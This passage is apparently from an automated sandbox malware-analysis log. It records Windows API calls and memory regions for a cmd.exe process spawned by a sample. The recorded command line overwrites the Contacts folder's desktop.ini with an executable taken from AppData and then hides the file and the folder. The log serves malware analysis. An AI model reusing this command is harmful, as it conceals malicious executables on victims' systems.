lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x32, lpOverlapped=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] GetFileType (hFile=0x4c) returned 0x1 [0218.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] GetFileType (hFile=0x4c) returned 0x1 [0218.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x32, lpOverlapped=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.148] _close (_FileHandle=4) returned 0 [0218.148] FindNextFileW (in: hFindFile=0x3a0e50, lpFindFileData=0x24eea4 | out: lpFindFileData=0x24eea4) returned 0 [0218.149] GetLastError () returned 0x12 [0218.149] FindClose (in: hFindFile=0x3a0e50 | out: hFindFile=0x3a0e50) returned 1 [0218.149] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0218.149] _close (_FileHandle=3) returned 0 [0218.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.149] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.150] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.150] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.150] SetConsoleInputExeNameW () returned 0x1 [0218.150] GetConsoleOutputCP () returned 0x1b5 [0218.150] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.150] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.150] exit (_Code=0) Process: id = "561" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xe3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32509 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32510 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32511 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32512 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32513 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32514 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32515 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32516 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32517 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32518 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32543 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32544 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32545 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32546 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 32547 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 32548 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32549 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32550 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32551 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32552 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32553 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32554 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32555 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32556 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32557 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 32558 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32559 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32560 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32561 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32562 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 32563 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32564 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 32565 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 32566 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 32591 start_va = 0x1260000 end_va = 0x152efff entry_point = 0x1260000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 765 os_tid = 0xbc4 [0217.925] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbdc | out: lpSystemTimeAsFileTime=0x16fbdc*(dwLowDateTime=0xb6b0a6a0, dwHighDateTime=0x1d440a9)) [0217.925] GetCurrentProcessId () returned 0xe3c [0217.925] GetCurrentThreadId () returned 0xbc4 [0217.925] GetTickCount () returned 0x3ce84 [0217.925] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbd4 | out: lpPerformanceCount=0x16fbd4*=27471423762) returned 1 [0217.926] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0217.926] __set_app_type (_Type=0x1) [0217.926] __p__fmode () returned 0x76b331f4 [0217.926] __p__commode () returned 0x76b331fc [0217.926] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0217.926] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0217.928] GetCurrentThreadId () returned 0xbc4 [0217.928] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc4) returned 0x38 [0217.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.928] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.928] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.928] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb6c | out: phkResult=0x16fb6c*=0x0) returned 0x2 [0217.928] VirtualQuery (in: lpAddress=0x16fba3, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.928] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.929] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.929] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.929] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0217.929] GetConsoleOutputCP () returned 0x1b5 [0217.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.929] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0217.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0217.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0217.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.930] GetEnvironmentStringsW () returned 0x210418* [0217.930] FreeEnvironmentStringsW (penv=0x210418) returned 1 [0217.930] GetEnvironmentStringsW () returned 0x210418* [0217.931] FreeEnvironmentStringsW (penv=0x210418) returned 1 [0217.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eadc | out: phkResult=0x16eadc*=0x40) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0xc8, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x0, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegCloseKey (hKey=0x40) returned 0x0 [0217.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eadc | out: phkResult=0x16eadc*=0x40) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x0, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x9, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x9, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x9, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegCloseKey (hKey=0x40) returned 0x0 [0217.931] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.931] srand (_Seed=0x5b8863b3) [0217.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" [0217.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" [0217.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.932] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.932] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.932] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.932] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.932] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.932] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.932] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.932] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.932] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.932] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.932] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.932] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.933] GetEnvironmentStringsW () returned 0x212568* [0217.933] FreeEnvironmentStringsW (penv=0x212568) returned 1 [0217.933] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.933] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.933] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.933] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.933] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.933] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.933] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.933] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.933] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.933] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.933] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.933] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8a8, lpFilePart=0x16f8a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f8a4*="Desktop") returned 0x18 [0217.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.933] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f624 | out: lpFindFileData=0x16f624) returned 0x210bf8 [0217.934] FindClose (in: hFindFile=0x210bf8 | out: hFindFile=0x210bf8) returned 1 [0217.934] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f624 | out: lpFindFileData=0x16f624) returned 0x210bf8 [0217.934] FindClose (in: hFindFile=0x210bf8 | out: hFindFile=0x210bf8) returned 1 [0217.934] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f624 | out: lpFindFileData=0x16f624) returned 0x210bf8 [0217.934] FindClose (in: hFindFile=0x210bf8 | out: hFindFile=0x210bf8) returned 1 [0217.934] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.934] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.934] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.934] GetEnvironmentStringsW () returned 0x210418* [0217.935] FreeEnvironmentStringsW (penv=0x210418) returned 1 [0217.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.935] GetConsoleOutputCP () returned 0x1b5 [0217.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.935] GetUserDefaultLCID () returned 0x409 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9e8, cchData=128 | out: lpLCData="0") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9e8, cchData=128 | out: lpLCData="0") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9e8, cchData=128 | out: lpLCData="1") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0217.936] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.937] GetConsoleTitleW (in: lpConsoleTitle=0x200a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.938] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.938] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.938] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.939] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0217.939] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0217.939] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0217.939] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0217.939] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0217.939] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0217.939] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0217.941] _wcsicmp (_String1="del", _String2=")") returned 59 [0217.941] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0217.941] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0217.941] _wcsicmp (_String1="IF", _String2="del") returned 5 [0217.941] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0217.941] _wcsicmp (_String1="REM", _String2="del") returned 14 [0217.941] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0217.943] _wcsicmp (_String1="type", _String2=")") returned 75 [0217.943] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0217.943] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0217.943] _wcsicmp (_String1="IF", _String2="type") returned -11 [0217.943] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0217.943] _wcsicmp (_String1="REM", 